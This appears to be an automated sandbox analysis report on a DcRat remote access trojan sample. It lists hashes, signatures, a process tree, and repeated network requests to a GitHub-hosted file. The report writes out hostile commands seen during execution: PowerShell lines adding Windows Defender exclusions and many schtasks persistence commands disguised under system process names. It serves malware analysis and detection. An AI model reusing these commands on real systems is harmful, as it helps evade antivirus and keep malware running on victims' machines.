Analysis

  • max time kernel
    150s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/11/2022, 11:56 UTC

General

  • Target

    aec4e3f0144d8192b6fc9259b3d16adca42fee27510bf9db5c318861e54af551.exe

  • Size

    1.3MB

  • MD5

    1e826c369faeb85df03d0c8926b294b5

  • SHA1

    18229c5857b8de750af00cd45a826f17ea5d894a

  • SHA256

    aec4e3f0144d8192b6fc9259b3d16adca42fee27510bf9db5c318861e54af551

  • SHA512

    4f03649a6c0e7abe542457205ebccd9dcd332285656ee970a0bfc9db17fe0e3dbab42f1408868041b61a7f468ca6c4d9777698992885373c24abe154ce3e06e1

  • SSDEEP

    24576:U2G/nvxW3Ww0t6TnzGmVBDh4+aknuRRZJND0gFJ4rD/IjC:UbA30GnzV/q+DnsXg

Score
10/10

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Process spawned unexpected child process 36 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • DCRat payload 15 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Executes dropped EXE 12 IoCs
  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 36 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aec4e3f0144d8192b6fc9259b3d16adca42fee27510bf9db5c318861e54af551.exe
    "C:\Users\Admin\AppData\Local\Temp\aec4e3f0144d8192b6fc9259b3d16adca42fee27510bf9db5c318861e54af551.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4824
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\providercommon\yTUdeXjbLOhnrN32dgrxVg.vbe"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\providercommon\1zu9dW.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4112
        • C:\providercommon\DllCommonsvc.exe
          "C:\providercommon\DllCommonsvc.exe"
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Drops file in Program Files directory
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:916
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3876
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\explorer.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3688
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\csrss.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2700
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\csrss.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:860
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\RuntimeBroker.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3528
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\services.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1780
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\cmd.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2220
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\SppExtComObj.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:808
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\spoolsv.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4212
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\hrtfs\dllhost.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4208
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\odt\lsass.exe'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1904
          • C:\odt\lsass.exe
            "C:\odt\lsass.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4144
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\x1DfgQ9qXa.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3904
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:624
                • C:\odt\lsass.exe
                  "C:\odt\lsass.exe"
                  7⤵
                  • Executes dropped EXE
                  • Checks computer location settings
                  • Modifies registry class
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:832
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\CTHuJZ10YE.bat"
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2224
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      9⤵
                        PID:2472
                      • C:\odt\lsass.exe
                        "C:\odt\lsass.exe"
                        9⤵
                        • Executes dropped EXE
                        • Checks computer location settings
                        • Modifies registry class
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:1488
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7kLsQlNPpi.bat"
                          10⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2108
                          • C:\Windows\system32\w32tm.exe
                            w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            11⤵
                              PID:2196
                            • C:\odt\lsass.exe
                              "C:\odt\lsass.exe"
                              11⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Modifies registry class
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2500
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\wpigNgqS7W.bat"
                                12⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2436
                                • C:\Windows\system32\w32tm.exe
                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                  13⤵
                                    PID:3188
                                  • C:\odt\lsass.exe
                                    "C:\odt\lsass.exe"
                                    13⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Modifies registry class
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:4216
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9gNv7qRJ8U.bat"
                                      14⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:3504
                                      • C:\Windows\system32\w32tm.exe
                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        15⤵
                                          PID:4220
                                        • C:\odt\lsass.exe
                                          "C:\odt\lsass.exe"
                                          15⤵
                                          • Executes dropped EXE
                                          • Checks computer location settings
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2800
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\MNu5MeZyGQ.bat"
                                            16⤵
                                              PID:3736
                                              • C:\Windows\system32\w32tm.exe
                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                17⤵
                                                  PID:2232
                                                • C:\odt\lsass.exe
                                                  "C:\odt\lsass.exe"
                                                  17⤵
                                                  • Executes dropped EXE
                                                  • Checks computer location settings
                                                  • Modifies registry class
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4292
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\NYP5fOsMgV.bat"
                                                    18⤵
                                                      PID:2956
                                                      • C:\Windows\system32\w32tm.exe
                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                        19⤵
                                                          PID:4148
                                                        • C:\odt\lsass.exe
                                                          "C:\odt\lsass.exe"
                                                          19⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          • Modifies registry class
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3612
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9gNv7qRJ8U.bat"
                                                            20⤵
                                                              PID:1168
                                                              • C:\Windows\system32\w32tm.exe
                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                21⤵
                                                                  PID:1824
                                                                • C:\odt\lsass.exe
                                                                  "C:\odt\lsass.exe"
                                                                  21⤵
                                                                  • Executes dropped EXE
                                                                  • Checks computer location settings
                                                                  • Modifies registry class
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2340
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\c0TJHXkWh8.bat"
                                                                    22⤵
                                                                      PID:3556
                                                                      • C:\Windows\system32\w32tm.exe
                                                                        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                        23⤵
                                                                          PID:2164
                                                                        • C:\odt\lsass.exe
                                                                          "C:\odt\lsass.exe"
                                                                          23⤵
                                                                          • Executes dropped EXE
                                                                          • Checks computer location settings
                                                                          • Modifies registry class
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5004
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ewVMycoP0v.bat"
                                                                            24⤵
                                                                              PID:2472
                                                                              • C:\Windows\system32\w32tm.exe
                                                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                25⤵
                                                                                  PID:4960
                                                                                • C:\odt\lsass.exe
                                                                                  "C:\odt\lsass.exe"
                                                                                  25⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:2476
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DigitalLocker\en-US\sppsvc.exe'
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4320
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1616
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:688
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:4672
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\providercommon\RuntimeBroker.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:3800
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\providercommon\RuntimeBroker.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:3404
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\providercommon\RuntimeBroker.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:2764
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\odt\explorer.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:4008
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:4700
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\odt\explorer.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1912
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\providercommon\csrss.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:208
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:228
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1556
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\providercommon\csrss.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1500
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:3880
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:3680
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\services.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:3080
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\services.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:4608
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Media Player\services.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:4136
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\cmd.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1408
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\twain_32\cmd.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1124
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Windows\twain_32\cmd.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:388
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\DigitalLocker\en-US\sppsvc.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1876
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\sppsvc.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1348
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 10 /tr "'C:\Windows\DigitalLocker\en-US\sppsvc.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:4548
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Start Menu\SppExtComObj.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:3752
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\SppExtComObj.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:2340
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Start Menu\SppExtComObj.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:3548
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\providercommon\spoolsv.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:884
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\providercommon\spoolsv.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:5060
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 13 /tr "'C:\providercommon\spoolsv.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1120
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\odt\lsass.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:3572
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:4252
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\odt\lsass.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:1872
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\dllhost.exe'" /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:4300
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\dllhost.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:2464
                                • C:\Windows\system32\schtasks.exe
                                  schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files\VideoLAN\VLC\hrtfs\dllhost.exe'" /rl HIGHEST /f
                                  1⤵
                                  • Process spawned unexpected child process
                                  • Creates scheduled task(s)
                                  PID:832

                                Network

                                • flag-us
                                  DNS
                                  raw.githubusercontent.com
                                  lsass.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  raw.githubusercontent.com
                                  IN A
                                  Response
                                  raw.githubusercontent.com
                                  IN A
                                  185.199.108.133
                                  raw.githubusercontent.com
                                  IN A
                                  185.199.109.133
                                  raw.githubusercontent.com
                                  IN A
                                  185.199.110.133
                                  raw.githubusercontent.com
                                  IN A
                                  185.199.111.133
                                • flag-us
                                  GET
                                  https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                  lsass.exe
                                  Remote address:
                                  185.199.108.133:443
                                  Request
                                  GET /justbio123/raven/main/api.txt HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: raw.githubusercontent.com
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Connection: keep-alive
                                  Content-Length: 1
                                  Cache-Control: max-age=300
                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                  Content-Type: text/plain; charset=utf-8
                                  ETag: "168c5d2e04f954ab0b60174efafb64796dd3683e7f11b684d66941ede8511cda"
                                  Strict-Transport-Security: max-age=31536000
                                  X-Content-Type-Options: nosniff
                                  X-Frame-Options: deny
                                  X-XSS-Protection: 1; mode=block
                                  X-GitHub-Request-Id: 732E:3E61:16F27B2:18AC026:63622E04
                                  Accept-Ranges: bytes
                                  Date: Wed, 02 Nov 2022 11:56:53 GMT
                                  Via: 1.1 varnish
                                  X-Served-By: cache-ams21075-AMS
                                  X-Cache: HIT
                                  X-Cache-Hits: 1
                                  X-Timer: S1667390213.094050,VS0,VE1
                                  Vary: Authorization,Accept-Encoding,Origin
                                  Access-Control-Allow-Origin: *
                                  X-Fastly-Request-ID: 40f3b8bbc757b6d3c235398ad707c584bf570d48
                                  Expires: Wed, 02 Nov 2022 12:01:53 GMT
                                  Source-Age: 275
                                • flag-us
                                  GET
                                  https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                  lsass.exe
                                  Remote address:
                                  185.199.108.133:443
                                  Request
                                  GET /justbio123/raven/main/api.txt HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                  Host: raw.githubusercontent.com
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Connection: keep-alive
                                  Content-Length: 1
                                  Cache-Control: max-age=300
                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                  Content-Type: text/plain; charset=utf-8
                                  ETag: "168c5d2e04f954ab0b60174efafb64796dd3683e7f11b684d66941ede8511cda"
                                  Strict-Transport-Security: max-age=31536000
                                  X-Content-Type-Options: nosniff
                                  X-Frame-Options: deny
                                  X-XSS-Protection: 1; mode=block
                                  X-GitHub-Request-Id: 732E:3E61:16F27B2:18AC026:63622E04
                                  Accept-Ranges: bytes
                                  Date: Wed, 02 Nov 2022 11:57:09 GMT
                                  Via: 1.1 varnish
                                  X-Served-By: cache-ams21036-AMS
                                  X-Cache: HIT
                                  X-Cache-Hits: 4
                                  X-Timer: S1667390230.921146,VS0,VE0
                                  Vary: Authorization,Accept-Encoding,Origin
                                  Access-Control-Allow-Origin: *
                                  X-Fastly-Request-ID: 0a8ac99fde41a2c32c4e60ca7d71fa13affbb297
                                  Expires: Wed, 02 Nov 2022 12:02:09 GMT
                                  Source-Age: 292
                                • flag-us
                                  GET
                                  https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                  lsass.exe
                                  Remote address:
                                  185.199.108.133:443
                                  Request
                                  GET /justbio123/raven/main/api.txt HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: raw.githubusercontent.com
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Connection: keep-alive
                                  Content-Length: 1
                                  Cache-Control: max-age=300
                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                  Content-Type: text/plain; charset=utf-8
                                  ETag: "168c5d2e04f954ab0b60174efafb64796dd3683e7f11b684d66941ede8511cda"
                                  Strict-Transport-Security: max-age=31536000
                                  X-Content-Type-Options: nosniff
                                  X-Frame-Options: deny
                                  X-XSS-Protection: 1; mode=block
                                  X-GitHub-Request-Id: 732E:3E61:16F27B2:18AC026:63622E04
                                  Accept-Ranges: bytes
                                  Date: Wed, 02 Nov 2022 11:57:23 GMT
                                  Via: 1.1 varnish
                                  X-Served-By: cache-ams21048-AMS
                                  X-Cache: HIT
                                  X-Cache-Hits: 1
                                  X-Timer: S1667390243.297327,VS0,VE1
                                  Vary: Authorization,Accept-Encoding,Origin
                                  Access-Control-Allow-Origin: *
                                  X-Fastly-Request-ID: 168fafb5c945c028766667218c505a5fd09271a7
                                  Expires: Wed, 02 Nov 2022 12:02:23 GMT
                                  Source-Age: 4
                                • flag-us
                                  GET
                                  https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                  lsass.exe
                                  Remote address:
                                  185.199.108.133:443
                                  Request
                                  GET /justbio123/raven/main/api.txt HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                  Host: raw.githubusercontent.com
                                  Connection: Keep-Alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Connection: keep-alive
                                  Content-Length: 1
                                  Cache-Control: max-age=300
                                  Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                  Content-Type: text/plain; charset=utf-8
                                  ETag: "168c5d2e04f954ab0b60174efafb64796dd3683e7f11b684d66941ede8511cda"
                                  Strict-Transport-Security: max-age=31536000
                                  X-Content-Type-Options: nosniff
                                  X-Frame-Options: deny
                                  X-XSS-Protection: 1; mode=block
                                  X-GitHub-Request-Id: 732E:3E61:16F27B2:18AC026:63622E04
                                  Accept-Ranges: bytes
                                  Date: Wed, 02 Nov 2022 11:57:39 GMT
                                  Via: 1.1 varnish
                                  X-Served-By: cache-ams21054-AMS
                                  X-Cache: HIT
                                  X-Cache-Hits: 1
                                  X-Timer: S1667390260.542069,VS0,VE1
                                  Vary: Authorization,Accept-Encoding,Origin
                                  Access-Control-Allow-Origin: *
